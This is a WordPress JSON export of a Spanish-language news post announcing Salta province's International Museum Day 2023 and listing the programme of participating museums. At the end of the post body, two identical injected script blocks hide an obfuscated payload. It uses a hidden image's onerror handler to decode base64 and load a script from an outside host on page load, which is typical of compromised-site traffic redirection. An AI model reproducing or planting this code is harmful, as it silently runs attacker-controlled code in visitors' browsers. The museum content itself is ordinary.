{"id":2629,"date":"2023-05-15T10:20:50","date_gmt":"2023-05-15T13:20:50","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2629"},"modified":"2025-08-14T00:16:59","modified_gmt":"2025-08-14T03:16:59","slug":"el-sabado-20-de-mayo-salta-celebrara-el-dia-internacional-de-los-museos-2023","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2629","title":{"rendered":"El s\u00e1bado 20 de mayo Salta celebrar\u00e1 el D\u00eda Internacional de los Museos 2023"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#7f600a\"><em>Anunciaron en Explora Salta el D\u00eda Internacional de los Museos (DIM), que se realizar\u00e1 el s\u00e1bado 20 de mayo, de 10 a 20 h, con entrada gratuita y actividades especiales en 27 museos de toda la provincia.<\/em><\/h3>\n\n\n\n<p>El lema de este a\u00f1o, instituido por el ICOM, es \u201cMuseos, sostenibilidad y bienestar\u201d. Los museos contribuyen de manera fundamental al bienestar y al desarrollo sostenible de nuestras comunidades. Como instituciones de confianza e importantes hilos en nuestro tejido social compartido, est\u00e1n en una posici\u00f3n \u00fanica para crear un efecto cascada que fomente el cambio positivo. Los museos pueden contribuir de muchas maneras a la consecuci\u00f3n de los Objetivos de Desarrollo Sostenible: desde el apoyo a la acci\u00f3n clim\u00e1tica y el fomento de la inclusi\u00f3n, hasta la lucha contra el aislamiento social y la mejora de la salud mental.<\/p>\n\n\n\n<figure class=\"wp-block-embed alignright is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"El s\u00e1bado 20 de mayo Salta celebrar\u00e1 el D\u00eda Internacional de los Museos 2023\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/4QrCcKhpvNs?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>El secretario de Cultura,&nbsp;<strong>Diego Ashur<\/strong>, destac\u00f3 \u00abeste D\u00eda Internacional de los Museos sucede en un a\u00f1o muy especial para nuestro pa\u00eds, ya que celebramos los 40 a\u00f1os de cultura en democracia ininterrumpida. Por eso, nos acompa\u00f1a El Telar de la Democracia, que es una met\u00e1fora cultural del entretejido social que venimos entretejiendo juntos\u00bb.<\/p>\n\n\n\n<p>Acompa\u00f1aron a Ashur los directores de los museos participantes, quienes interactuaron con los diversos medios de prensa que se acercaron.<\/p>\n\n\n\n<p>Es importante destacar que, como cada a\u00f1o, se unen museos provinciales, nacionales, municipales y privados para esta celebraci\u00f3n, de los cuales 11 son de diferentes municipios del interior provincial.<\/p>\n\n\n\n<p>Dentro de las actividades programadas \u00fanicamente para la fecha, se pueden destacar: caminatas y charlas relacionadas a la sostenibilidad y el bienestar, muestras y visitas guiadas especiales, pintura pavimental en acci\u00f3n por el clima, stands e informaci\u00f3n sobre alimentaci\u00f3n saludable, espacios de yoga y relajaci\u00f3n, relatos orales, espect\u00e1culos de danza, talleres, m\u00fasica en vivo, maquillaje art\u00edstico, un planetario, arte en vivo a cargo de Felipe Catal\u00e1n, t\u00edteres, actividades recreativas para ni\u00f1os y mucho m\u00e1s.<\/p>\n\n\n\n<p>La celebraci\u00f3n del D\u00eda Internacional de los Museos es organizada, como siempre, por el Gobierno de la Provincia de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y la Subsecretar\u00eda de Patrimonio Cultural. Esta gesti\u00f3n de gobierno trabaja fuertemente para que los museos sean espacios de encuentro, de aprendizaje, de contenci\u00f3n, din\u00e1micos, y de puertas abiertas para todos y todas. El DIM y la Noche de los Museos son una muestra de ello, son actividades de adhesi\u00f3n masiva que salte\u00f1os, salte\u00f1as y turistas incluyen en su agenda cada a\u00f1o.<\/p>\n\n\n\n<p><strong>PROGRAMACI\u00d3N DIA INTERNACIONAL DE LOS MUSEOS 2023<\/strong><\/p>\n\n\n\n<p>\u201cMuseos, sostenibilidad y bienestar \u201c<\/p>\n\n\n\n<p><strong>S\u00e1bado 20 de mayo<\/strong><\/p>\n\n\n\n<p>ENTRADA LIBRE Y GRATUITA<\/p>\n\n\n\n<p><strong>Museos de Salta Capital<\/strong><\/p>\n\n\n\n<p>&#8211; Museo de Arqueolog\u00eda de Alta Monta\u00f1a \u2013 MAAM (Mitre 77): abierto de 10 a 20 hs.<\/p>\n\n\n\n<p>Inauguraci\u00f3n de la muestra \u00abEn la piel del Jaguar\u00bb.<\/p>\n\n\n\n<p>Se trata de la presentaci\u00f3n de una muestra arqueol\u00f3gica de Canciller\u00eda, en forma conjunta con el Museo Hist\u00f3rico del Norte y Parques Nacionales.<\/p>\n\n\n\n<p>En el MAAM, se expondr\u00e1n relatos orales guaran\u00edes, relacionados con el yaguaret\u00e9.<\/p>\n\n\n\n<p>&#8211; Museo de Arte Contempor\u00e1neo \u2013 MAC (Zuvir\u00eda 90): abierto de 10 a 20 hs.<\/p>\n\n\n\n<p>17:15 y 18hs: Performance del Ballet de la Provincia. La actividad ser\u00e1 en el marco de la muestra HISTORIAS BREVES DE MUJERES NO BREVES. Mujeres en la colecci\u00f3n del MAC, en planta baja.<\/p>\n\n\n\n<p>19hs: M\u00fasica y relato de poes\u00eda, actividad &nbsp;en el marco de la muestra HISTORIAS BREVES DE MUJERES NO BREVES. Mujeres en la colecci\u00f3n del MAC.<\/p>\n\n\n\n<p>&#8211; Museo de Bellas Artes de Salta (Av. Belgrano 992): abierto de 10 a 20 hs.<\/p>\n\n\n\n<p>17hs: Taller de ESCULTURA Minecraft.<\/p>\n\n\n\n<p>El mismo se trata de armar y desarmar la obra de arte en cubos de papel. La obra de arte es Danza Ritual I, II, III de Elsa Salfity. Actividad destinada a ni\u00f1os de 6 a 10 a\u00f1os de edad.<\/p>\n\n\n\n<p>18hs: Visita guiada por la muestra SALFITY PUBLICA.<\/p>\n\n\n\n<p>&#8211; Complejo Explora Salta (La Florida 20): abierto de 10 a 20 hs.<\/p>\n\n\n\n<p>18hs: M\u00fasica en el museo<\/p>\n\n\n\n<p>Concierto de la orquesta juvenil de tango La Strappata. La Orquesta de Tango La Strappata es un proyecto pedag\u00f3gico iniciado en 2019 en la ciudad de Salta. Su objetivo es estudiar en profundidad la m\u00fasica ciudadana a trav\u00e9s de los estilos m\u00e1s representativos de la \u00e9poca dorada del g\u00e9nero: An\u00edbal Troilo, Horacio Salg\u00e1n, Juan D\u2019Arienzo, Alfredo Gobbi, Osvaldo Pugliese, Carlos Di Sarli, entre otros. Dirigida por el \u00c1ngel Lapdula e integrada por j\u00f3venes de entre 15 y 25 a\u00f1os.<\/p>\n\n\n\n<p><strong>Rincones de maquillaje y poes\u00eda<\/strong><\/p>\n\n\n\n<p>Durante la jornada propondremos un rinc\u00f3n m\u00f3vil de maquillaje con motivos de la naturaleza y lectura de poemas del poeta mapuche Elicura Chihuailaf Nahuelp\u00e1n. Aleatoriamente iremos instalando una manta y almohadones en diferentes rincones del museo, en distintos momentos de la jornada.<\/p>\n\n\n\n<p>&#8211; Museo G\u00fcemes (Espa\u00f1a 730): abierto de 10 a 20 hs.<\/p>\n\n\n\n<p>Aprendiendo sobre comida saludable junto al stand de \u00abRa\u00edz\u00bb (alimentos saludables).<\/p>\n\n\n\n<p>A part\u00edr de las 11 hs y cada hora se trabaja en el espacio de yoga y relajaci\u00f3n de la mano de la Prof. Florencia Mangione.<\/p>\n\n\n\n<p>&#8211; Museo de Antropolog\u00eda de Salta (Ej\u00e9rcito del Norte y Ricardo Sol\u00e1): abierto de 10 a 20 hs.<\/p>\n\n\n\n<p>17hs: \u201cEl Planetario de Amauta\u201d. Actividad gratuita. Destinada a ni\u00f1os y ni\u00f1as &nbsp;(y grandes) que tengan los pies en la tierra y los ojos en el cielo. Es una experiencia de proyecci\u00f3n que permite adentrarnos, mediante una narraci\u00f3n en la que Amauta, un ni\u00f1o de una comunidad originaria, nos cuenta sus experiencias (heredadas de sus antepasados) mirando el cielo de noche. La propuesta de Amauta es transportarnos al tiempo de sus ancestros, donde los relatos cobraban mayor significaci\u00f3n, para vivir la experiencia de abstraernos en el cielo, al menos por un momento, como si nada m\u00e1s existiera.<\/p>\n\n\n\n<p>&#8211; Museo Hist\u00f3rico del Norte \u2013 Cabildo (Caseros 549): abierto de 14 a 20:30 hs.<\/p>\n\n\n\n<p>&#8211; Museo \u201cPresidente Jos\u00e9 Evaristo Uriburu\u201d (Caseros 417): abierto de 14 a 20:30 hs.<\/p>\n\n\n\n<p>&#8211; Museo de la Ciudad \u201cCasa de Hern\u00e1ndez\u201d (La Florida 97): abierto de 10 a 20 hs.<\/p>\n\n\n\n<p>Se podr\u00e1 visitar la exposici\u00f3n \u201cEl tan sabio juego del arte\u201d de Felipe Catal\u00e1n.<\/p>\n\n\n\n<p>18 hs. MASTER CLASS CON FELIPE CATAL\u00c1N \u201cLa intuici\u00f3n, como herramienta de creaci\u00f3n\u201d. El artista realizar\u00e1 una demostraci\u00f3n en vivo y expondr\u00e1 su forma de creaci\u00f3n a partir de trabajar con la t\u00e9cnica de pintura aplastada y dibujo libre.<\/p>\n\n\n\n<p>Entrada libre y gratuita hasta completar aforo.<\/p>\n\n\n\n<p>&#8211; Museo Hist\u00f3rico Policia (Gral. G\u00fcemes 750) abierto de 10 a 20hs.<\/p>\n\n\n\n<p>&#8211; 10 a 12 hs: T\u00edteres infantiles con tem\u00e1tica policial.<\/p>\n\n\n\n<p>&#8211; 12 a 13 hs: Recorrido guiado.<\/p>\n\n\n\n<p>&#8211; 14 a 16 hs: Nos visitar\u00e1n los personajes Institucionales (SEVI, EDUVI, LUPITA, CHISPITA, RAYO Y UCUMAR).<\/p>\n\n\n\n<p>&#8211; 16 a 18 hs: Lectura y relatos de cuentos policiales, Mitos y leyendas &nbsp;donde contaremos con la presenciade Fabio P\u00e9rez Paz.<\/p>\n\n\n\n<p>&#8211; 18 a 19 hs: Recorrido guiado.<\/p>\n\n\n\n<p>&#8211; 19 a 19:30hs: Contaremos con la visita de la Embajada Cultural de los Instructores de los Cuerpos Infantiles quienes bailar\u00e1n ritmos aut\u00f3ctonos<\/p>\n\n\n\n<p>&#8211; 19:30 a 20 hs: Presentaci\u00f3n de grupo de folclore andino \u201cEy Paisano\u201d<\/p>\n\n\n\n<p>&#8211; Museo San Francisco (Catamarca): abierto de 17 a 20 hs.<\/p>\n\n\n\n<p>Visitas al circuito de arte sacro y galer\u00eda del antiguo convento. Ingreso sin reserva previa y hasta agotar la capacidad de aforo de las salas.<\/p>\n\n\n\n<p>&#8211; Museo de Ciencias Naturales abierto de 16 a 20hs.<\/p>\n\n\n\n<p>17 hs: visita guiada<\/p>\n\n\n\n<p>Este d\u00eda la entrada ser\u00e1 libre y gratuita para los visitantes. Se recuerda que por reglamentaci\u00f3n interna el cupo m\u00e1ximo es de 45 visitantes de manera simult\u00e1nea.<\/p>\n\n\n\n<p>&#8211; Museo Hist\u00f3rico de la U.N.Sa. \u201cProf. Eduardo Ashur\u201d (Buenos Aires 177): abierto de 10 a 20hs<\/p>\n\n\n\n<p>Estar\u00e1n a disposici\u00f3n de los visitantes las siguientes muestras:<\/p>\n\n\n\n<p>Historia del Palacio Zorrilla.<\/p>\n\n\n\n<p>3D una Experiencia Hist\u00f3rica.<\/p>\n\n\n\n<p>Muestra colectiva Homenaje a la Mujer.<\/p>\n\n\n\n<p>Retrato y Atm\u00f3sfera una ciudad Liminar. Salta en el Siglo XX.<\/p>\n\n\n\n<p>Obras selectas de la pinacoteca de la Universidad Nacional de Salta.<\/p>\n\n\n\n<p>18:30 hs: Presentaciones en vivo: Ezequiel Correa \u2013 Cantante\/int\u00e9rprete.<\/p>\n\n\n\n<p>15:30 a 17 hs Actividades l\u00fadicas para ni\u00f1eces.<\/p>\n\n\n\n<p>&#8211; Museo Casa Taller \u201cJorge Hugo Rom\u00e1n\u201d (Pje Primera Junta 1924): abierto de 15 a 19hs.<\/p>\n\n\n\n<p>Visitas guiadas en grupo<\/p>\n\n\n\n<p>&#8211; Museo Hist\u00f3rico del Regimiento de Caballer\u00eda de Exploraci\u00f3n Monta\u00f1a 5 \u201cGral. G\u00fcemes\u201d (Av. Arenales s\/n al lado del Hospital Militar): abierto de 17hs a 20hs.<\/p>\n\n\n\n<p>17 hs: CARRUSEL DE LA BANDA MILITAR CNL BONIFACIO RUIZ D ELOS LLANOS CON HOMENAJE A MALVINAS<\/p>\n\n\n\n<p>18 hs: RELATOS DE MALVINAS POR EX COMBATIENTES SALTE\u00d1OS QUE PARTICIPARON EN LA GESTA.<\/p>\n\n\n\n<p>19 hs: HOMENAJE A MALVINAS Y A LOS MUSEOS POR EL DUO SIANCA.<\/p>\n\n\n\n<p>EXPOSICIONES DE LA COLECCION NUMISMASTICA DE ENZO DIAZ. EXPOSICION DE LA ASOCIACION DE VETERANOS D EGUERRA DE MALVINAS. EXPOSICION DE CUADROS \u00abHOMENAJE\u00bb DE ROXANA d\u00b4EMPIRE. VISITA GUIADA POR EL MUSEO DE LOS INFERNALES.<\/p>\n\n\n\n<p>PROYECCION: VIDEO: HERMANDAD. 40 A\u00d1OS D EMALVINAS.<\/p>\n\n\n\n<p><strong>Museos de Municipios<\/strong><\/p>\n\n\n\n<p>&#8211; Museo de la Vid y el Vino (Av. G\u00fcemes Sur y Ferm\u00edn Perdiguero &#8211; Cafayate): abierto de 10 a 20 hs.<\/p>\n\n\n\n<p>16 hs: Presentaci\u00f3n del grupo \u201cJuanetes\u201d la banda de rock para ni\u00f1os. Realizar\u00e1 un espect\u00e1culo musical en el patio del Museo.<\/p>\n\n\n\n<p>&#8211; Museo Arqueol\u00f3gico \u201cP. P. D\u00edaz\u201d (Juan Calchaqu\u00ed s\/n &#8211; Cachi): abierto de 10 a 18 hs.<\/p>\n\n\n\n<p>Jueves 18 a las 16 hs<\/p>\n\n\n\n<p>Caminata dialogada a un sitio arqueol\u00f3gico<\/p>\n\n\n\n<p>Participantes: museo y hospital<\/p>\n\n\n\n<p>P\u00fablico: adultos mayores.<\/p>\n\n\n\n<p>Caminata con abuelos desde el hospital hasta el sitio Arqueol\u00f3gico \u201cEl Tero\u201d donde con gu\u00edas comunitarios van a realizar el recorrido por el sitio, mientras se dialoga y se intercambian saberes y relatos alrededor del sitio.<\/p>\n\n\n\n<p>Viernes 19 a las 16 hs<\/p>\n\n\n\n<p>Intervenci\u00f3n en los colegios con charla taller sobre el rol de los museos en la sostenibilidad y el bienestar.<\/p>\n\n\n\n<p>Participantes: hospital, colegio secundario de Cachi y museo<\/p>\n\n\n\n<p>P\u00fablico destinado: adolescentes<\/p>\n\n\n\n<p>Las intervenciones refieren anticiparnos al recreo y realizar una intervenci\u00f3n de juegos de trivia, carrera de postas y charla taller sobre la importancia de la preservaci\u00f3n y el cuidado del medio ambiente y su relaci\u00f3n con el cambio clim\u00e1tico.<\/p>\n\n\n\n<p>S\u00e1bado 20 a las 15<\/p>\n\n\n\n<p>Intercambio de saberes y formas sostenibles de producci\u00f3n.<\/p>\n\n\n\n<p>Participantes: museo, hospital y referentes ind\u00edgenas.<\/p>\n\n\n\n<p>P\u00fablico destinado: p\u00fablico general.<\/p>\n\n\n\n<p>Mesa panel en la que ese comparte la importancia del cuidado del suelo, formas sostenibles de producci\u00f3n e impacto ambiental por parte de comunidades y referentes ind\u00edgenas, asimismo se compartir\u00e1n las estrategias; la alimentaci\u00f3n saludable, comidas t\u00edpicas y regionales, consumo de la producci\u00f3n local, programa de huertas lo van a explicar referentes del hospital. Mesa coordinada por equipo del museo que realizar\u00e1 un resumen y sistematizaci\u00f3n de lo expuesto haciendo alusi\u00f3n sobre el impacto ambiental en las formas de producci\u00f3n y su relaci\u00f3n con el cambio clim\u00e1tico.<\/p>\n\n\n\n<p>&#8211; Museo &nbsp;\u201cQuinquela Mart\u00edn\u201d (San Mart\u00edn 456 \u2013 R\u00ba de la Frontera): abierto de 10 a 20 hs.<\/p>\n\n\n\n<p><strong>JUEVES 18 DE MAYO<\/strong><\/p>\n\n\n\n<p>Desde las 9 hs PINTURA PAVIMENTAL \u2013 ACCION POR EL CLIMA<\/p>\n\n\n\n<p>Se realizar\u00e1 sobre el pavimento pinturas art\u00edsticas creando un manto de color con mensajes de acciones que debemos realizar para revertir la situaci\u00f3n del impacto ambiental cr\u00edtico que tenemos en el presente, la misma dejar\u00e1 plasmado una expresi\u00f3n de j\u00f3venes y adultos dispuestos a tomar medidas urgentes para combatir el cambio clim\u00e1tico.<\/p>\n\n\n\n<p>La realizaci\u00f3n estar\u00e1 a cargo del Profesor Fernando Portal con alumnos del Taller de Artes Aplicadas del Inst. Sup. de Formaci\u00f3n Docente N\u00b06025, alumnos de nivel secundario del Colegio San Gabriel N\u00b08137 Cooperativa de Trabajo de Educaci\u00f3n y alumnos del Taller de Dibujo y Pintura del Museo Quinquela Martin.<\/p>\n\n\n\n<p>Tambi\u00e9n se regalar\u00e1n plantines de \u00e1rboles para repoblar de \u00e1rboles en la ciudad a los presentes y vecinos en lugares que hagan falta.<\/p>\n\n\n\n<p>&#8211; Museo Regional de Cs. Nat. Prof. Parodi Bustos (San Mart\u00edn 303 \u2013 Campamento Vespucio): abierto de 10 a 19hs.<\/p>\n\n\n\n<p>16 hs: \u201cEl Museo ense\u00f1a jugando\u201d. Visita guiada adaptada para ni\u00f1os de 4 a 6 a\u00f1os y actividades recreativas en la confecci\u00f3n de rompecabezas, que se entrega como obsequio de la visita.<\/p>\n\n\n\n<p>&#8211; Museo de sitio Santa Rosa de Tastil (Rta Nac 51): abierto de 10 a17hs<\/p>\n\n\n\n<p>Atenci\u00f3n al p\u00fablico<\/p>\n\n\n\n<p>&#8211; Museo de la Vida Rural Salte\u00f1a (Rta P48 km25): abierto de 10 a 17hs<\/p>\n\n\n\n<p>Atenci\u00f3n al p\u00fablico<\/p>\n\n\n\n<p>&#8211; Museo Jallpha Kalchaki (San Carlos &#8211; Belgrano esquina G\u00fcemes s\/n San Carlos) abierto de 8 a 19hs.<\/p>\n\n\n\n<p>Se podr\u00e1 visitar la muestra &nbsp;\u00abUn Tramo del Viaje\u00bb del artista pl\u00e1stico Paolo Soto, quien exhibe una serie de acuarelas y dibujos<\/p>\n\n\n\n<p>&#8211; Museo Regional Andino &nbsp;(Brigido Zabaleta s\/n \u2013 San Antonio de los Cobres): abierto de 11 a<\/p>\n\n\n\n<p>10 hs: Guiados Especiales en el Museo Regional Andino. Exposici\u00f3n de artesan\u00edas, temporada de invierno 2023.<\/p>\n\n\n\n<p>12 hs: Demostraci\u00f3n de c\u00f3mo hacer charqui. Degustaci\u00f3n de juego de airampo.<\/p>\n\n\n\n<p>14 hs: Juegos Recreativos para ni\u00f1os, adolescentes y adultos.<\/p>\n\n\n\n<p>16 hs: Funci\u00f3n de t\u00edteres: \u201cEl Zorro y el Quirquincho\u201d<\/p>\n\n\n\n<p>17 hs: Guiados Especiales.<\/p>\n\n\n\n<p>18 hs: Gran Pe\u00f1a Folcl\u00f3rica.<\/p>\n\n\n\n<p>&#8211; Museo Popular de Iruya (Belgrano s\/n\u00ba al lado de la iglesia): abierto de 10 a 16 hs.<\/p>\n\n\n\n<p>Se podr\u00e1 visitar el museo con entrada libre y gratuita, sin reservas.<\/p>\n\n\n\n<p>&#8211; Museo del Tabaco \u00abPuerta de Diaz\u00bb<\/p>\n\n\n\n<p>Se podr\u00e1 visitar la Colecci\u00f3n Arqueol\u00f3gica en forma libre y gratuita para la fecha.<\/p>\n\n\n\n<p>&#8211; Museo Hist\u00f3rico Municipal \u201cMolino de Piedra\u201d (Av. San Mart\u00edn 2176 esq. Las Zanjas &#8211; Vaqueros): abierto de 11 a 19 hs.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Anunciaron en Explora Salta el D\u00eda Internacional de los Museos (DIM), que se realizar\u00e1 el s\u00e1bado 20 de mayo, de 10 a 20 h, con entrada gratuita y actividades especiales en 27 museos de toda la provincia. El lema de este a\u00f1o, instituido por el ICOM, es \u201cMuseos, sostenibilidad y bienestar\u201d. Los museos contribuyen de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2630,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-2629","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2629"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2629"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2629\/revisions"}],"predecessor-version":[{"id":7085,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2629\/revisions\/7085"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2630"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2629"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2629"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2629"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}